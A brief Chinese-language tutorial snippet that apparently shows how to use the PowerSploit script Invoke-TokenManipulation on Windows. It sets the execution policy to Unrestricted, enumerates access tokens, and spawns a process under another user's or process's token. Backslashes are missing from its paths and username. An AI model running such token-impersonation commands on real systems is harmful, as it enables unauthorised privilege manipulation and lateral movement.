使用invoke-tokenmanipulation进行降权
枚举所有令牌
PS C:UsersSMC> Get-ExecutionPolicy
Restricted
PS C:UsersSMC> Set-ExecutionPolicy Unrestricted
PS C:UsersSMCDesktop> Import-Module .Invoke-TokenManipulation.ps1
PS C:UsersSMCDesktop> Invoke-TokenManipulation -Enumerate
指定用户名降权
Invoke-TokenManipulation -CreateProcess "calc.exe" -Username "DESKTOP-2SLO69Lkeke"
指定进程降权
Invoke-TokenManipulation -CreateProcess "calc.exe" -Processid "4488"